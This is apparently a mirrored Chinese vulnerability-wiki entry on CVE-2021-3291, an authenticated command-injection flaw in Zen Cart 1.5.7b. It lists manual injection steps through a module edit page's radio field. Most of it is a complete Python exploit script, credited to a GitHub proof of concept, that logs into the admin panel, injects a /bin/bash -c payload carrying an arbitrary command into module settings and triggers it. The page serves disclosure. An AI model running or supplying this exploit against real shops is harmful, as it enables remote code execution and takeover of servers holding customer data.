跳转至

Zen Cart 1.5.7b 任意命令执行(CVE-2021-3291)

Zen Cart 1.5.7b 管理员通过检查HTML radiobox元素(在模块编辑页面内),通过插入命令来执行任意命令。

  • 1-)以管理员身份登录
  • 2-)获取任何模块编辑页面
  • 3-)检查元素任何真实的单选框
  • 4-)将true更改为true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo id; //
  • 5-)点击更新
  • 6-)触发命令再次进入编辑页面

CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291

zencart_v157b_authenticated_rce_exploit.py:

#!/usr/bin/python3
import mechanize as mc
import sys
import re
from bs4 import BeautifulSoup as bs
import base64 as B

try:
    url = sys.argv[1]
    assert url[-1] == "/"
    username = sys.argv[2]
    password = sys.argv[3]
    com = sys.argv[4]
except:
    print ("Usage: {sys.argv[0]} http://target.com/zencart/crackXXXXX/ username password command")
    exit(1)

moduls = ["payment","shipping","ordertotal","plugin_manager"] # default

br = mc.Browser()
br.set_handle_robots(False)
br.addheaders=[('User-agent','Chrome')]

br.open(url+"login.php")

br.select_form("loginForm")
br.form["admin_name"] = username
br.form["admin_pass"] = password
send = br.submit()

mod = moduls[0]
adres = url+"index.php?cmd=modules&set="+mod
kaynak = br.open(adres).read()
adr = re.findall(b'<a href=".{150}', kaynak)
adr2 = []
for i in adr:
    if b"&amp;module=" in i and b"action=remove" not in i:
        adr2.append(i.split(b'<a href="')[1].split(b'"')[0].replace(b"&amp;",b"&").decode())

for ek in adr2:
    kaynak = br.open(ek).read()
    if b"id=\"editButton\">Edit</a>" in kaynak:
        print (f"Target url: {ek}&action=edit")
        br.open(ek+"&action=edit")
        br.select_form("modules")
        form = br.forms()[0]
        liste = b""
        for con in form.controls:
            try:
                deger = br.form.find_control(name=con.name).value
                boyut = len(deger)
                if type(deger) == list:
                    if boyut == 0 or deger[0] == "True" or deger[0] == "False":
                        liste += con.name.encode() + b"=" +  f"True','F'); echo `/bin/bash -c '{com}'`; //".encode() + b"&"
                        print("Payload injected")
                    else:
                        liste +=  con.name.encode() + b"=" + deger[0].encode() + b"&"
                else:
                    liste +=  con.name.encode() + b"=" + deger.encode() + b"&"
            except:
                pass
        print (liste[:-1])
        #br.set_proxies({"http": "localhost:5555"})
        ac = br.open(ek+"&action=save", liste[:-1])
        son = br.open(ek+"&action=edit")
        son = br.open(ek+"&action=edit")
        son = br.open(ek+"&action=edit")
        break

from:https://github.com/MucahitSaratar/zencart_auth_rce_poc